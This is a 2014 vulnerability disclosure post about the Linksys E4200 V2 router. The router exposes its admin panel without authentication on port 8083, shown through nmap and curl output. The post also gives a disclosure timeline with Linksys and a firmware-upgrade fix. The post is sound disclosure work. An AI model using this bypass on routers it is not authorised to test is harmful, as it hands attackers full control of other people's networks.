Model: Linksys E4200 V2 Router
Vendor Disclosure: 12th February 2014
Public Disclosure: 4th June 2014
Bypass Web Panel Authentication and Gain Full Administrative Privileges on Device
I discovered the Linksys E4200 V2 Router has a backdoor that bypasses HTTP/S authentication and gives full administrative access to the admin panel.
The device listens on port 8083 with the same interface as port 80, but completely circumvents HTTP/S authentication granting admin privileges on the device.
This is not the same as 'TheMoon' Worm Remote Code Execution Vulnerability.
A portscan of the device shows port 8083/tcp listening for connections:
[phrag@box ~]$ nmap 192.168.2.4 PORT STATE SERVICE 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 8083/tcp open us-srv
A HTTP GET request on port 80 without authentication returns 201 Unauthorized:
[phrag@box ~]$ curl -i http://192.168.2.10:80 HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Linksys E4200" Content-Type: text/html Content-Length: 351 Date: Tue, 11 Feb 2014 23:41:11 GMT Server: lighttpd/1.4.28
A HTTP GET request on port 8083 without authentication returns 200 OK and has full admin privileges:
[phrag@box ~]$ curl -i http://192.168.2.10:8083 HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Date: Tue, 11 Feb 2014 23:35:36 GMT Server: lighttpd/1.4.28 <!-- // Utopia_Init: SUCCEEDED (rc = 1) // Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
Internal: Allows anyone on the network full admin privileges over the device.
External: This depends entirely on the network configuration. Considering only bridge mode, some forwarding or DMZ would need to be in place to expose this on the internet.
Unknown: Further testing with alternate configurations other than bridge mode is required.
The device was reset to factory default settings and configured minimally for testing with admin password, wifi, bridge mode.
Firmware 2.0.37 is installed from factory and the firmware screen incorrectly reports it is running the latest firmware (see screenshot below). New firmware is available as of 2012 from the Linksys support site. The device had internet access. Therefore the device firmware update checking feature is broken, making this more serious, as non-techincal users may not be aware new firmware is available and are unknowingly exposed by this backdoor.
This is apparently fixed in newer firmwares, however there is no mention of this vulnerability in the changelog and Linksys (Belkin) refuse to give me a copy of the 2.0.36 firmware so i am unable to test new firmware without losing access to the old.
As part of a responsible disclosure process, I contacted Linksys February 12th. It took a few weeks before they took me seriously, but then responded and asked me to do more testing. I did and gave them the results, of which they committed to releasing a CVE for this.
It is now June and no CVE nor further correspondence from Linksys was received, even after I contacted them multiple times for an update, and again 1 week ago stating i would like to publicly disclose this vulnerability.
I publicly disclosed this for the following reasons:
It must be noted that i only tested this in bridge mode as i did not want to expose it on the internet and have limited lab equipment.
Manually download and upgrade to the latest firmware from Linksys E4200 Support
Linksys (whom are now owned by Belkin) failed to take this vulnerability seriously, address the issue in a timely manner and disclose the problem to their customers which left them at risk.
The undocumented port 8083 issue, with this resulting administrative access, was previously discovered several months ago by another researcher and was already assigned CVE-2013-5122:
"It is recommend to upgrade to firmware 2.1.39 on the E4200v2"
"by simply browsing to: http://
published on 2014-06-04 13:33:37 by phrag